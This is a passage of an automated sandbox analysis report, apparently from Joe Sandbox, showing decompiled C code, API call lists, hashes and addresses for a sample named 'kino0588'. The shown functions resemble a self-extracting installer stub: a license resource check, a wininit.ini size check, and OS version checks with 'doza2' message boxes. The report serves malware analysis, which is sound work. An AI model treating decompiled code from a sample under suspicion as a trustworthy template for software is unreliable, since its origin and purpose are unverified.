                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                                                    • String ID: Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                                                    • API String ID: 3346862599-1109908249
                                                                                                                                                                                                                                    • Opcode ID: f64472c693f1b3d6814de6b4d3b2a646bafbf5d688aaba3942a764a0b59bca8c
                                                                                                                                                                                                                                    • Instruction ID: 0b9a98903ff877e80cad587af08150168cda6f1a16924b2678fa5f4956579163
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f64472c693f1b3d6814de6b4d3b2a646bafbf5d688aaba3942a764a0b59bca8c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96316131A002289FDF21DF11CC45FAAB778FF46768F0401A7E949A2140DB319E89CFA2
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00193A3F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 73memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E00193A3F(void* __eflags) {
				void* _t3;
				void* _t9;
				CHAR* _t16;

				_t16 = "LICENSE";
				_t1 = E0019468F(_t16, 0, 0) + 1; // 0x1
				_t3 = LocalAlloc(0x40, _t1);
				 *0x198d4c = _t3;
				if(_t3 != 0) {
					_t19 = _t16;
					if(E0019468F(_t16, _t3, _t28) != 0) {
						if(lstrcmpA( *0x198d4c, "<None>") == 0) {
							LocalFree( *0x198d4c);
							L9:
							 *0x199124 = 0;
							return 1;
						}
						_t9 = E00196517(_t19, 0x7d1, 0, E00193100, 0, 0);
						LocalFree( *0x198d4c);
						if(_t9 != 0) {
							goto L9;
						}
						 *0x199124 = 0x800704c7;
						L2:
						return 0;
					}
					E001944B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree( *0x198d4c);
					 *0x199124 = 0x80070714;
					goto L2;
				}
				E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x199124 = E00196285();
				goto L2;
			}






                                                                                                                                                                                                                                    0x00193a46
                                                                                                                                                                                                                                    0x00193a57
                                                                                                                                                                                                                                    0x00193a5d
                                                                                                                                                                                                                                    0x00193a63
                                                                                                                                                                                                                                    0x00193a6a
                                                                                                                                                                                                                                    0x00193a91
                                                                                                                                                                                                                                    0x00193a9a
                                                                                                                                                                                                                                    0x00193ad8
                                                                                                                                                                                                                                    0x00193b13
                                                                                                                                                                                                                                    0x00193b19
                                                                                                                                                                                                                                    0x00193b1b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193b21
                                                                                                                                                                                                                                    0x00193ae7
                                                                                                                                                                                                                                    0x00193af4
                                                                                                                                                                                                                                    0x00193afc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193afe
                                                                                                                                                                                                                                    0x00193a87
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193a87
                                                                                                                                                                                                                                    0x00193aa8
                                                                                                                                                                                                                                    0x00193ab3
                                                                                                                                                                                                                                    0x00193ab9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193ab9
                                                                                                                                                                                                                                    0x00193a78
                                                                                                                                                                                                                                    0x00193a82
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
                                                                                                                                                                                                                                      • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00192F64,?,00000002,00000000), ref: 00193A5D
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00193AB3
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
                                                                                                                                                                                                                                      • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
                                                                                                                                                                                                                                      • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(<None>,00000000), ref: 00193AD0
                                                                                                                                                                                                                                    • LocalFree.KERNEL32 ref: 00193B13
                                                                                                                                                                                                                                      • Part of subcall function 00196517: FindResourceA.KERNEL32(00190000,000007D6,00000005), ref: 0019652A
                                                                                                                                                                                                                                      • Part of subcall function 00196517: LoadResource.KERNEL32(00190000,00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00196538
                                                                                                                                                                                                                                      • Part of subcall function 00196517: DialogBoxIndirectParamA.USER32(00190000,00000000,00000547,001919E0,00000000), ref: 00196557
                                                                                                                                                                                                                                      • Part of subcall function 00196517: FreeResource.KERNEL32(00000000,?,?,00192EE8,00000000,001919E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00196560
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00193100,00000000,00000000), ref: 00193AF4
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$LICENSE
                                                                                                                                                                                                                                    • API String ID: 2414642746-383193767
                                                                                                                                                                                                                                    • Opcode ID: 1737c5b425ad83e42ea283e5c7f0edf2b6de0febfc26df6a6b9e695d13a74ee1
                                                                                                                                                                                                                                    • Instruction ID: 09dea75269919d5999bb19de0adc1038055ca664c2985616fd401be621afe5ba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1737c5b425ad83e42ea283e5c7f0edf2b6de0febfc26df6a6b9e695d13a74ee1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22110B70300201ABDF24AF7A9C09E1B79F9EFDAB10B10413FB546D6AF0DB7988408665
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001924E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E001924E0(void* __ebx) {
				signed int _v8;
				char _v268;
				void* __edi;
				void* __esi;
				signed int _t7;
				void* _t20;
				long _t26;
				signed int _t27;

				_t20 = __ebx;
				_t7 =  *0x198004; // 0x21bd9a3c
				_v8 = _t7 ^ _t27;
				_t25 = 0x104;
				_t26 = 0;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					E0019658A( &_v268, 0x104, "wininit.ini");
					WritePrivateProfileStringA(0, 0, 0,  &_v268);
					_t25 = _lopen( &_v268, 0x40);
					if(_t25 != 0xffffffff) {
						_t26 = _llseek(_t25, 0, 2);
						_lclose(_t25);
					}
				}
				return E00196CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
			}











                                                                                                                                                                                                                                    0x001924e0
                                                                                                                                                                                                                                    0x001924eb
                                                                                                                                                                                                                                    0x001924f2
                                                                                                                                                                                                                                    0x001924f7
                                                                                                                                                                                                                                    0x00192504
                                                                                                                                                                                                                                    0x0019250e
                                                                                                                                                                                                                                    0x0019251d
                                                                                                                                                                                                                                    0x0019252c
                                                                                                                                                                                                                                    0x00192541
                                                                                                                                                                                                                                    0x00192546
                                                                                                                                                                                                                                    0x00192553
                                                                                                                                                                                                                                    0x00192555
                                                                                                                                                                                                                                    0x00192555
                                                                                                                                                                                                                                    0x00192546
                                                                                                                                                                                                                                    0x0019256c

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00192506
                                                                                                                                                                                                                                    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0019252C
                                                                                                                                                                                                                                    • _lopen.KERNEL32 ref: 0019253B
                                                                                                                                                                                                                                    • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0019254C
                                                                                                                                                                                                                                    • _lclose.KERNEL32(00000000), ref: 00192555
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                                                    • String ID: wininit.ini
                                                                                                                                                                                                                                    • API String ID: 3273605193-4206010578
                                                                                                                                                                                                                                    • Opcode ID: 22bbfe699905cad73879b3c5401264b56b22c6e29b8ed7c18de2a4ebe32b385d
                                                                                                                                                                                                                                    • Instruction ID: eed31c57369d91a012c8a10075d7d61862dfcdbbf0b918de9b04fe31204aaa2a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22bbfe699905cad73879b3c5401264b56b22c6e29b8ed7c18de2a4ebe32b385d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C01B53260011867DB20AB659C0CEDF7B7CDF85750F450156FA49D3190DF748E85CAE1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 001936EE Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 243windowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                                                    			E001936EE(CHAR* __ecx) {
				signed int _v8;
				char _v268;
				struct _OSVERSIONINFOA _v416;
				signed int _v420;
				signed int _v424;
				CHAR* _v428;
				CHAR* _v432;
				signed int _v436;
				CHAR* _v440;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t72;
				CHAR* _t77;
				CHAR* _t91;
				CHAR* _t94;
				int _t97;
				CHAR* _t98;
				signed char _t99;
				CHAR* _t104;
				signed short _t107;
				signed int _t109;
				short _t113;
				void* _t114;
				signed char _t115;
				short _t119;
				CHAR* _t123;
				CHAR* _t124;
				CHAR* _t129;
				signed int _t131;
				signed int _t132;
				CHAR* _t135;
				CHAR* _t138;
				signed int _t139;

				_t72 =  *0x198004; // 0x21bd9a3c
				_v8 = _t72 ^ _t139;
				_v416.dwOSVersionInfoSize = 0x94;
				_t115 = __ecx;
				_t135 = 0;
				_v432 = __ecx;
				_t138 = 0;
				if(GetVersionExA( &_v416) != 0) {
					_t133 = _v416.dwMajorVersion;
					_t119 = 2;
					_t77 = _v416.dwPlatformId - 1;
					__eflags = _t77;
					if(_t77 == 0) {
						_t119 = 0;
						__eflags = 1;
						 *0x198184 = 1;
						 *0x198180 = 1;
						L13:
						 *0x199a40 = _t119;
						L14:
						__eflags =  *0x198a34 - _t138; // 0x0
						if(__eflags != 0) {
							goto L66;
						}
						__eflags = _t115;
						if(_t115 == 0) {
							goto L66;
						}
						_v428 = _t135;
						__eflags = _t119;
						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
						_t11 =  &_v420;
						 *_t11 = _v420 & _t138;
						__eflags =  *_t11;
						_v440 = _t115;
						do {
							_v424 = _t135 * 0x18;
							_v436 = E00192A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
							_t91 = E00192A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
							_t123 = _v436;
							_t133 = 0x54d;
							__eflags = _t123;
							if(_t123 < 0) {
								L32:
								__eflags = _v420 - 1;
								if(_v420 == 1) {
									_t138 = 0x54c;
									L36:
									__eflags = _t138;
									if(_t138 != 0) {
										L40:
										__eflags = _t138 - _t133;
										if(_t138 == _t133) {
											L30:
											_v420 = _v420 & 0x00000000;
											_t115 = 0;
											_v436 = _v436 & 0x00000000;
											__eflags = _t138 - _t133;
											_t133 = _v432;
											if(__eflags != 0) {
												_t124 = _v440;
											} else {
												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
												_v420 =  &_v268;
											}
											__eflags = _t124;
											if(_t124 == 0) {
												_t135 = _v436;
											} else {
												_t99 = _t124[0x30];
												_t135 = _t124[0x34] + 0x84 + _t133;
												__eflags = _t99 & 0x00000001;
												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x198a38 & 0x00000001;
											if(( *0x198a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("doza2");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E0019681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "doza2", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E001967C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E001928E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x199a40 = _t119;
						 *0x198184 = 1;
						 *0x198180 = 1;
						__eflags = _t133 - 3;
						if(_t133 > 3) {
							__eflags = _t133 - 5;
							if(_t133 < 5) {
								goto L14;
							}
							_t113 = 3;
							_t119 = _t113;
							goto L13;
						}
						_t119 = 1;
						_t114 = 3;
						 *0x199a40 = 1;
						__eflags = _t133 - _t114;
						if(__eflags < 0) {
							L9:
							 *0x198184 = _t135;
							 *0x198180 = _t135;
							goto L14;
						}
						if(__eflags != 0) {
							goto L14;
						}
						__eflags = _v416.dwMinorVersion - 0x33;
						if(_v416.dwMinorVersion >= 0x33) {
							goto L14;
						}
						goto L9;
					}
					_t138 = 0x4ca;
					goto L44;
				} else {
					_t138 = 0x4b4;
					L44:
					_push(_t135);
					_push(0x10);
					_push(_t135);
					_push(_t135);
					L65:
					_t133 = _t138;
					E001944B9(0, _t138);
					L66:
					return E00196CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
				}
			}





































                                                                                                                                                                                                                                    0x001936f9
                                                                                                                                                                                                                                    0x00193700
                                                                                                                                                                                                                                    0x0019370c
                                                                                                                                                                                                                                    0x00193716
                                                                                                                                                                                                                                    0x00193718
                                                                                                                                                                                                                                    0x0019371b
                                                                                                                                                                                                                                    0x00193721
                                                                                                                                                                                                                                    0x0019372b
                                                                                                                                                                                                                                    0x0019373d
                                                                                                                                                                                                                                    0x00193745
                                                                                                                                                                                                                                    0x00193746
                                                                                                                                                                                                                                    0x00193746
                                                                                                                                                                                                                                    0x00193749
                                                                                                                                                                                                                                    0x001937ab
                                                                                                                                                                                                                                    0x001937ad
                                                                                                                                                                                                                                    0x001937ae
                                                                                                                                                                                                                                    0x001937b3
                                                                                                                                                                                                                                    0x001937b8
                                                                                                                                                                                                                                    0x001937b8
                                                                                                                                                                                                                                    0x001937bf
                                                                                                                                                                                                                                    0x001937bf
                                                                                                                                                                                                                                    0x001937c5
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001937cb
                                                                                                                                                                                                                                    0x001937cd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001937d5
                                                                                                                                                                                                                                    0x001937db
                                                                                                                                                                                                                                    0x001937e8
                                                                                                                                                                                                                                    0x001937ea
                                                                                                                                                                                                                                    0x001937ea
                                                                                                                                                                                                                                    0x001937ea
                                                                                                                                                                                                                                    0x001937f0
                                                                                                                                                                                                                                    0x001937f6
                                                                                                                                                                                                                                    0x00193805
                                                                                                                                                                                                                                    0x00193817
                                                                                                                                                                                                                                    0x0019382b
                                                                                                                                                                                                                                    0x00193830
                                                                                                                                                                                                                                    0x00193836
                                                                                                                                                                                                                                    0x0019383b
                                                                                                                                                                                                                                    0x0019383d
                                                                                                                                                                                                                                    0x001938eb
                                                                                                                                                                                                                                    0x001938eb
                                                                                                                                                                                                                                    0x001938f2
                                                                                                                                                                                                                                    0x0019390c
                                                                                                                                                                                                                                    0x00193911
                                                                                                                                                                                                                                    0x00193911
                                                                                                                                                                                                                                    0x00193913
                                                                                                                                                                                                                                    0x0019394d
                                                                                                                                                                                                                                    0x0019394d
                                                                                                                                                                                                                                    0x0019394f
                                                                                                                                                                                                                                    0x001938a9
                                                                                                                                                                                                                                    0x001938a9
                                                                                                                                                                                                                                    0x001938b0
                                                                                                                                                                                                                                    0x001938b2
                                                                                                                                                                                                                                    0x001938b9
                                                                                                                                                                                                                                    0x001938bb
                                                                                                                                                                                                                                    0x001938c1
                                                                                                                                                                                                                                    0x00193975
                                                                                                                                                                                                                                    0x001938c7
                                                                                                                                                                                                                                    0x001938de
                                                                                                                                                                                                                                    0x001938e0
                                                                                                                                                                                                                                    0x001938e0
                                                                                                                                                                                                                                    0x0019397b
                                                                                                                                                                                                                                    0x0019397d
                                                                                                                                                                                                                                    0x001939a9
                                                                                                                                                                                                                                    0x0019397f
                                                                                                                                                                                                                                    0x00193982
                                                                                                                                                                                                                                    0x0019398b
                                                                                                                                                                                                                                    0x0019398d
                                                                                                                                                                                                                                    0x0019398f
                                                                                                                                                                                                                                    0x0019399f
                                                                                                                                                                                                                                    0x001939a1
                                                                                                                                                                                                                                    0x00193991
                                                                                                                                                                                                                                    0x00193991
                                                                                                                                                                                                                                    0x00193991
                                                                                                                                                                                                                                    0x0019398f
                                                                                                                                                                                                                                    0x001939af
                                                                                                                                                                                                                                    0x001939b6
                                                                                                                                                                                                                                    0x00193a0f
                                                                                                                                                                                                                                    0x00193a0f
                                                                                                                                                                                                                                    0x00193a11
                                                                                                                                                                                                                                    0x00193a13
                                                                                                                                                                                                                                    0x00193a19
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939b8
                                                                                                                                                                                                                                    0x001939b8
                                                                                                                                                                                                                                    0x001939ba
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939bc
                                                                                                                                                                                                                                    0x001939bf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939c3
                                                                                                                                                                                                                                    0x001939c9
                                                                                                                                                                                                                                    0x001939ce
                                                                                                                                                                                                                                    0x001939d0
                                                                                                                                                                                                                                    0x001939e3
                                                                                                                                                                                                                                    0x001939e5
                                                                                                                                                                                                                                    0x001939e6
                                                                                                                                                                                                                                    0x001939f1
                                                                                                                                                                                                                                    0x001939f7
                                                                                                                                                                                                                                    0x001939fa
                                                                                                                                                                                                                                    0x00193a01
                                                                                                                                                                                                                                    0x00193a04
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193a06
                                                                                                                                                                                                                                    0x00193a09
                                                                                                                                                                                                                                    0x00193a09
                                                                                                                                                                                                                                    0x00193a0b
                                                                                                                                                                                                                                    0x00193a0b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193a09
                                                                                                                                                                                                                                    0x001939fc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939fc
                                                                                                                                                                                                                                    0x001939d3
                                                                                                                                                                                                                                    0x001939d8
                                                                                                                                                                                                                                    0x001939da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001939dc
                                                                                                                                                                                                                                    0x001939b6
                                                                                                                                                                                                                                    0x00193955
                                                                                                                                                                                                                                    0x0019395b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193961
                                                                                                                                                                                                                                    0x00193963
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193969
                                                                                                                                                                                                                                    0x00193969
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193969
                                                                                                                                                                                                                                    0x00193915
                                                                                                                                                                                                                                    0x00193915
                                                                                                                                                                                                                                    0x0019391b
                                                                                                                                                                                                                                    0x0019391f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019392d
                                                                                                                                                                                                                                    0x00193933
                                                                                                                                                                                                                                    0x00193938
                                                                                                                                                                                                                                    0x0019393a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193940
                                                                                                                                                                                                                                    0x00193946
                                                                                                                                                                                                                                    0x0019394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019394b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001938f2
                                                                                                                                                                                                                                    0x00193843
                                                                                                                                                                                                                                    0x00193845
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019384b
                                                                                                                                                                                                                                    0x0019384d
                                                                                                                                                                                                                                    0x00193883
                                                                                                                                                                                                                                    0x00193885
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019389a
                                                                                                                                                                                                                                    0x0019389e
                                                                                                                                                                                                                                    0x0019389e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001938a0
                                                                                                                                                                                                                                    0x001938a0
                                                                                                                                                                                                                                    0x001938a2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001938a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001938a4
                                                                                                                                                                                                                                    0x0019384f
                                                                                                                                                                                                                                    0x00193851
                                                                                                                                                                                                                                    0x00193857
                                                                                                                                                                                                                                    0x0019386e
                                                                                                                                                                                                                                    0x00193877
                                                                                                                                                                                                                                    0x0019387b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193881
                                                                                                                                                                                                                                    0x00193859
                                                                                                                                                                                                                                    0x0019385c
                                                                                                                                                                                                                                    0x00193862
                                                                                                                                                                                                                                    0x00193866
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00193868
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001938f4
                                                                                                                                                                                                                                    0x001938f4
                                                                                                                                                                                                                                    0x001938f5
                                                                                                                                                                                                                                    0x001938fb
                                                                                                                                                                                                                                    0x00193901
                                                                                                                                                                                                                                    0x00193901
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0019390a
                                                                                                                                                                                                                                    0x0019374b
                                                                                                                                                                                                                                    0x0019374e
                                                                                                                                                                                                                                    0x0019375c
                                                                                                                                                                                                                                    0x00193764
                                                                                                                                                                                                                                    0x00193769
                                                                                                                                                                                                                                    0x0019376e
                                                                                                                                                                                                                                    0x00193771
                                                                                                                                                                                                                                    0x0019379c
                                                                                                                                                                                                                                    0x0019379f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001937a3
                                                                                                                                                                                                                                    0x001937a4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001937a4
                                                                                                                                                                                                                                    0x00193773
                                                                                                                                                                                                                                    0x00193777
